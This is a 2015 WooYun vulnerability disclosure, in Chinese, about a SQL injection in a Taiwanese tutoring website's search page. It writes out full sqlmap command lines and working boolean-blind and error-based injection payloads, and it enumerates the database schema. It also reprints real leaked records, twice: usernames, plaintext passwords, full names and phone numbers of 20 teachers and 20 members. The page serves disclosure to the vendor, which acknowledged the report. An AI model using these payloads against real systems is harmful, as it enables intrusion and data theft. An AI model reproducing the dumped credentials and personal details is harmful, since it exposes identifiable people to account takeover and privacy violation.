創意王數位科技有限公司旗下家教銀行存在SQL註射漏洞（4萬多名教師，3萬多名用戶的明文密碼及個人隱私泄露）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156541

漏洞标题：創意王數位科技有限公司旗下家教銀行存在SQL註射漏洞（4萬多名教師，3萬多名用戶的明文密碼及個人隱私泄露）（臺灣地區）

漏洞作者：路人甲

提交时间：2015-11-30 09:20

修复时间：2016-01-16 01:42

公开时间：2016-01-16 01:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-30：细节已通知厂商并且等待厂商处理中
2015-12-02：厂商已经确认，细节仅向厂商公开
2015-12-12：细节向核心白帽子及相关领域专家公开
2015-12-22：细节向普通白帽子公开
2016-01-01：细节向实习白帽子公开
2016-01-16：细节向公众公开

简要描述：

創意王數位科技有限公司旗下家教銀行存在SQL註射漏洞（4萬多名教師，3萬多名用戶的明文密碼及個人隱私泄露）

详细说明：

地址：http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2

$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch  -D tutorbankcomtw -T teacher -C t_user,t_passwd,t_name1,t_name2,t_phone --dump --start 1 --stop 20

$ python sqlmap.py -u "http://**.**.**.**/tsearch_language.php?s1=XNzx&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2" -p s1 --technique=BE --random-agent --batch  -D tutorbankcomtw -T member -C m_user,m_passwd,m_mobile,m_login,m_email --dump --start 1 --stop 20

Database: tutorbankcomtw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| teacher                               | 42398   |
| member                                | 32900   |

Database: tutorbankcomtw
Table: teacher
[20 entries]
+---------------+-------------+---------+---------+-------------+
| t_user        | t_passwd    | t_name1 | t_name2 | t_phone     |
+---------------+-------------+---------+---------+-------------+
| <blank>       | <blank>     | <blank> | <blank> | <blank>     |
| <blank>       | <blank>     | <blank> | <blank> | NULL        |
| <blank>       | zdwofcbz    | <blank> | <blank> | NULL        |
|  Anitaloa0620 | c0931266116 | 駱       | 芷葳      | 0917556907  |
|  b35417       | wnrlkwyhd   | 陳       | 皓暘      | 0986612653  |
|  c20044413    | franky1020  | 范       | 元璟      | NULL        |
|  candyhom     | 5200517     | 鍾       | 宛均      | <blank>     |
|  Caven        | 87304034    | 劉       | 宜勝      | 0939103896  |
|  cchdenis     | 6996110     | 蘇       | 柏丞      | 076996110   |
|  friend68688  | yf1234      | 伍       | 建勳      | <blank>     |
|  ooobiff      | 19867742    | 吳       | 韻柔      | 0937456439  |
|  tsengasir    | s22083214   | 曾       | 星瑜      | 0988778363  |
|  yenx2        | delia999    | 張       | 心玥      | <blank>     |
|  yingzhen0531 | 12a3sd      | 李       | 瑛珍      | <blank>     |
| 000000        | 000000      | Ann     | lai     | 02-25874786 |
| 000027        | 000027      | 楊       | 俊煌      | 0939711313  |
| 0000val       | 00000505    | 何       | 敏嘉      | NULL        |
| 000321478965  | 19880104    | 邱       | 奕鳴      | 0953226959  |
| 001014        | greg001014  | 劉       | 俊麟      | 04-8344890  |
| 0017          | supergirl   | 羅       | 奕芳      | 04-25223515 |
+---------------+-------------+---------+---------+-------------+

Database: tutorbankcomtw
Table: member
[20 entries]
+------------------+------------+-------------+---------------------+-----------------------------+
| m_user           | m_passwd   | m_mobile    | m_login             | m_email                     |
+------------------+------------+-------------+---------------------+-----------------------------+
| <blank>          | 7i78qaKl   | <blank>     | 2015-06-10 07:48:36 | otomozi@**.**.**.**    |
|   mimilu28       | 123popo123 | 0983550798  | 2014-03-02 21:25:37 | mimilu28@**.**.**.**        |
|  aries_mlee      | aries1676  | <blank>     | 2014-03-02 21:25:37 | aries_mlee@**.**.**.**     |
|  Burberry001     | phoebe02   | 0955875406  | 2014-09-11 11:41:34 | Burberry00168@**.**.**.**  |
|  candy0925136751 | 0925136751 | 0925-136751 | 2014-03-02 21:25:37 | candy0925@**.**.**.**     |
|  cchsu53         | a861028    | 0910295547  | 2014-03-02 21:25:37 | cchsu53@**.**.**.**        |
|  cc_ice_cc       | 57205720   | 0955-013880 | 2014-03-02 21:25:37 | ice83807@**.**.**.**        |
|  chadchen1026    | 579ch056   | 0930888452  | 2014-03-02 21:25:37 | chadchen1026@**.**.**.**   |
|  chin0889        | jane0889   | 0971155602  | 2014-03-02 21:25:37 | chin0889@**.**.**.**       |
|  cicitina        | 740308     | 0928607807  | 2014-03-02 21:25:37 | cici_tina@**.**.**.**           |
|  delia           | 880217     | 0928166695  | 2014-03-02 21:25:37 | delia.vincent@**.**.**.** |
|  grace-chou      | 5892186    | 0910294528  | 2014-03-02 21:25:37 | jimes_chiu@**.**.**.**    |
|  j120951954      | 561256     | 0936595361  | 2014-03-02 21:25:37 | care.lee@**.**.**.**      |
|  jamsab          | sabrina    | 0935360842  | 2014-03-02 21:25:37 | jamsab@**.**.**.**      |
|  joan621120      | 621120     | 0922694790  | 2014-03-02 21:25:37 | joan621120@**.**.**.**     |
|  joechen         | 1234qwer   | <blank>     | 2014-03-02 21:25:37 | joechen7@**.**.**.**          |
|  kelly11252003   | abc478751  | <blank>     | 2014-03-02 21:25:37 | kelly11252003@**.**.**.**  |
|  kevinmao        | aa590720   | 0937-310679 | 2014-03-02 21:25:37 | kevinmao@**.**.**.**        |
|  kiwicat         | dn1186     | <blank>     | 2014-03-19 10:05:33 | kiwicat98@**.**.**.**         |
|  ky6773          | 22421637   | 0922495526  | 2014-03-02 21:25:37 | ky6773@**.**.**.**         |
+------------------+------------+-------------+---------------------+-----------------------------+

漏洞证明：

---
Parameter: s1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user:    'tutorbankcomtw@%'
current user is DBA:    False
database management system users [1]:
[*] 'tutorbankcomtw'@'%'
Database: tutorbankcomtw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| teacher                               | 42398   |
| member                                | 32900   |
| t_logintime                           | 28380   |
| member_app                            | 13131   |
| m_logintime                           | 12955   |
| teacher_favor                         | 12588   |
| teacher_app                           | 9493    |
| case_favor                            | 5756    |
| newcase                               | 5538    |
| smilepay                              | 1788    |
| iepay_1                               | 862     |
| iepay_2                               | 195     |
| index1ad                              | 5       |
| indexad                               | 5       |
| teacherad                             | 4       |
| memberad                              | 3       |
| casead                                | 2       |
| upad                                  | 2       |
| index2ad                              | 1       |
| index3ad                              | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 768     |
| SESSION_VARIABLES                     | 329     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 60      |
| TABLES                                | 60      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| KEY_COLUMN_USAGE                      | 19      |
| STATISTICS                            | 19      |
| TABLE_CONSTRAINTS                     | 19      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| PROCESSLIST                           | 2       |
| SCHEMATA                              | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: tutorbankcomtw
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| m_passwd | varchar(16) |
+----------+-------------+
Database: tutorbankcomtw
Table: teacher
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| t_passwd | varchar(16) |
+----------+-------------+

web application technology: Apache
back-end DBMS: MySQL 5.0
Database: tutorbankcomtw
Table: teacher
[83 columns]
+--------------+---------------------+
| Column       | Type                |
+--------------+---------------------+
| area1        | tinyint(1)          |
| area2        | tinyint(1)          |
| area3        | tinyint(1)          |
| area4        | tinyint(1)          |
| area5        | tinyint(1)          |
| area6        | tinyint(1)          |
| authcode     | varchar(8)          |
| city         | varchar(9)          |
| city1        | varchar(15)         |
| city2        | varchar(15)         |
| city3        | varchar(15)         |
| city4        | varchar(15)         |
| city5        | varchar(15)         |
| city6        | varchar(15)         |
| class1       | varchar(240)        |
| class10      | varchar(240)        |
| class11      | varchar(240)        |
| class12      | varchar(240)        |
| class13      | varchar(240)        |
| class2       | varchar(240)        |
| class3       | varchar(240)        |
| class4       | varchar(240)        |
| class5       | varchar(240)        |
| class6       | varchar(240)        |
| class7       | varchar(240)        |
| class8       | varchar(240)        |
| class9       | varchar(240)        |
| conton       | varchar(9)          |
| picpath      | varchar(30)         |
| state        | tinyint(1)          |
| t_contact1   | varchar(4)          |
| t_contact2   | varchar(4)          |
| t_content    | text                |
| t_count      | int(7)              |
| t_del        | tinyint(1)          |
| t_email      | varchar(40)         |
| t_exp        | tinyint(1)          |
| t_fore       | tinyint(1)          |
| t_fri        | varchar(24)         |
| t_gentle     | varchar(6)          |
| t_grader     | varchar(66)         |
| t_id         | int(7) unsigned     |
| t_ip         | varchar(20)         |
| t_job        | varchar(12)         |
| t_joindate   | datetime            |
| t_level      | tinyint(1)          |
| t_leveltime  | datetime            |
| t_leveltime2 | datetime            |
| t_licence    | text                |
| t_login      | datetime            |
| t_mobile     | varchar(12)         |
| t_mon        | varchar(24)         |
| t_month      | tinyint(1)          |
| t_name1      | varchar(10)         |
| t_name2      | varchar(10)         |
| t_open1      | tinyint(1)          |
| t_open2      | tinyint(1)          |
| t_open3      | tinyint(1)          |
| t_passwd     | varchar(16)         |
| t_phone      | varchar(20)         |
| t_poll       | tinyint(1)          |
| t_push       | tinyint(1)          |
| t_pushtime   | datetime            |
| t_recivie    | tinyint(1)          |
| t_salary1    | int(4)              |
| t_salary2    | int(4)              |
| t_sat        | varchar(24)         |
| t_sch1       | varchar(90)         |
| t_sch2       | varchar(42)         |
| t_sch3       | varchar(9)          |
| t_sex        | varchar(6)          |
| t_sid        | varchar(11)         |
| t_status     | tinyint(1)          |
| t_sun        | varchar(24)         |
| t_teach      | varchar(39)         |
| t_thu        | varchar(24)         |
| t_try        | varchar(9)          |
| t_tue        | varchar(24)         |
| t_update     | datetime            |
| t_user       | varchar(16)         |
| t_vip        | tinyint(1)          |
| t_wed        | varchar(24)         |
| t_year       | tinyint(1) unsigned |
+--------------+---------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: tutorbankcomtw
Table: teacher
[20 entries]
+---------------+-------------+---------+---------+-------------+
| t_user        | t_passwd    | t_name1 | t_name2 | t_phone     |
+---------------+-------------+---------+---------+-------------+
| <blank>       | <blank>     | <blank> | <blank> | <blank>     |
| <blank>       | <blank>     | <blank> | <blank> | NULL        |
| <blank>       | zdwofcbz    | <blank> | <blank> | NULL        |
|  Anitaloa0620 | c0931266116 | 駱       | 芷葳      | 0917556907  |
|  b35417       | wnrlkwyhd   | 陳       | 皓暘      | 0986612653  |
|  c20044413    | franky1020  | 范       | 元璟      | NULL        |
|  candyhom     | 5200517     | 鍾       | 宛均      | <blank>     |
|  Caven        | 87304034    | 劉       | 宜勝      | 0939103896  |
|  cchdenis     | 6996110     | 蘇       | 柏丞      | 076996110   |
|  friend68688  | yf1234      | 伍       | 建勳      | <blank>     |
|  ooobiff      | 19867742    | 吳       | 韻柔      | 0937456439  |
|  tsengasir    | s22083214   | 曾       | 星瑜      | 0988778363  |
|  yenx2        | delia999    | 張       | 心玥      | <blank>     |
|  yingzhen0531 | 12a3sd      | 李       | 瑛珍      | <blank>     |
| 000000        | 000000      | Ann     | lai     | 02-25874786 |
| 000027        | 000027      | 楊       | 俊煌      | 0939711313  |
| 0000val       | 00000505    | 何       | 敏嘉      | NULL        |
| 000321478965  | 19880104    | 邱       | 奕鳴      | 0953226959  |
| 001014        | greg001014  | 劉       | 俊麟      | 04-8344890  |
| 0017          | supergirl   | 羅       | 奕芳      | 04-25223515 |
+---------------+-------------+---------+---------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: tutorbankcomtw
Table: member
[31 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| city        | varchar(9)   |
| conton      | varchar(9)   |
| m_address   | varchar(100) |
| m_cert      | varchar(10)  |
| m_class     | tinyint(1)   |
| m_contact1  | varchar(4)   |
| m_contact2  | varchar(4)   |
| m_count     | int(7)       |
| m_del       | tinyint(1)   |
| m_email     | varchar(40)  |
| m_fax       | varchar(20)  |
| m_id        | int(7)       |
| m_ins       | text         |
| m_inter     | tinyint(1)   |
| m_ip        | varchar(20)  |
| m_joindate  | datetime     |
| m_level     | tinyint(1)   |
| m_leveltime | datetime     |
| m_login     | datetime     |
| m_mobile    | varchar(12)  |
| m_name      | varchar(42)  |
| m_open1     | tinyint(1)   |
| m_open2     | tinyint(1)   |
| m_open3     | tinyint(1)   |
| m_open4     | tinyint(1)   |
| m_passwd    | varchar(16)  |
| m_phone     | varchar(20)  |
| m_poll      | tinyint(1)   |
| m_recivie   | tinyint(1)   |
| m_update    | datetime     |
| m_user      | varchar(16)  |
+-------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s1 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: s1=XNzx%00') AND 4998=4998#&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: s1=XNzx%00') AND (SELECT 9431 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(9431=9431,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BaDQ'='BaDQ&s2=&s4=fOQh&s5=&s6=eXwc&s7=&s8=ExYz&Submit2=%E6%9F%A5%E8%A9%A2
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: tutorbankcomtw
Table: member
[20 entries]
+------------------+------------+-------------+---------------------+-----------------------------+
| m_user           | m_passwd   | m_mobile    | m_login             | m_email                     |
+------------------+------------+-------------+---------------------+-----------------------------+
| <blank>          | 7i78qaKl   | <blank>     | 2015-06-10 07:48:36 | otomozi@**.**.**.**    |
|   mimilu28       | 123popo123 | 0983550798  | 2014-03-02 21:25:37 | mimilu28@**.**.**.**        |
|  aries_mlee      | aries1676  | <blank>     | 2014-03-02 21:25:37 | aries_mlee@**.**.**.**     |
|  Burberry001     | phoebe02   | 0955875406  | 2014-09-11 11:41:34 | Burberry00168@**.**.**.**  |
|  candy0925136751 | 0925136751 | 0925-136751 | 2014-03-02 21:25:37 | candy0925@**.**.**.**     |
|  cchsu53         | a861028    | 0910295547  | 2014-03-02 21:25:37 | cchsu53@**.**.**.**        |
|  cc_ice_cc       | 57205720   | 0955-013880 | 2014-03-02 21:25:37 | ice83807@**.**.**.**        |
|  chadchen1026    | 579ch056   | 0930888452  | 2014-03-02 21:25:37 | chadchen1026@**.**.**.**   |
|  chin0889        | jane0889   | 0971155602  | 2014-03-02 21:25:37 | chin0889@**.**.**.**       |
|  cicitina        | 740308     | 0928607807  | 2014-03-02 21:25:37 | cici_tina@**.**.**.**           |
|  delia           | 880217     | 0928166695  | 2014-03-02 21:25:37 | delia.vincent@**.**.**.** |
|  grace-chou      | 5892186    | 0910294528  | 2014-03-02 21:25:37 | jimes_chiu@**.**.**.**    |
|  j120951954      | 561256     | 0936595361  | 2014-03-02 21:25:37 | care.lee@**.**.**.**      |
|  jamsab          | sabrina    | 0935360842  | 2014-03-02 21:25:37 | jamsab@**.**.**.**      |
|  joan621120      | 621120     | 0922694790  | 2014-03-02 21:25:37 | joan621120@**.**.**.**     |
|  joechen         | 1234qwer   | <blank>     | 2014-03-02 21:25:37 | joechen7@**.**.**.**          |
|  kelly11252003   | abc478751  | <blank>     | 2014-03-02 21:25:37 | kelly11252003@**.**.**.**  |
|  kevinmao        | aa590720   | 0937-310679 | 2014-03-02 21:25:37 | kevinmao@**.**.**.**        |
|  kiwicat         | dn1186     | <blank>     | 2014-03-19 10:05:33 | kiwicat98@**.**.**.**         |
|  ky6773          | 22421637   | 0922495526  | 2014-03-02 21:25:37 | ky6773@**.**.**.**         |
+------------------+------------+-------------+---------------------+-----------------------------+

修复方案：

增加过滤。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-12-02 01:41

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156541

漏洞标题：創意王數位科技有限公司旗下家教銀行存在SQL註射漏洞（4萬多名教師，3萬多名用戶的明文密碼及個人隱私泄露）（臺灣地區）

相关厂商：創意王數位科技

漏洞作者：路人甲

提交时间：2015-11-30 09:20

修复时间：2016-01-16 01:42

公开时间：2016-01-16 01:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156541

漏洞标题：創意王數位科技有限公司旗下家教銀行存在SQL註射漏洞（4萬多名教師，3萬多名用戶的明文密碼及個人隱私泄露）（臺灣地區）

相关厂商：創意王數位科技

漏洞作者： 路人甲

提交时间：2015-11-30 09:20

修复时间：2016-01-16 01:42

公开时间：2016-01-16 01:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0156541"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云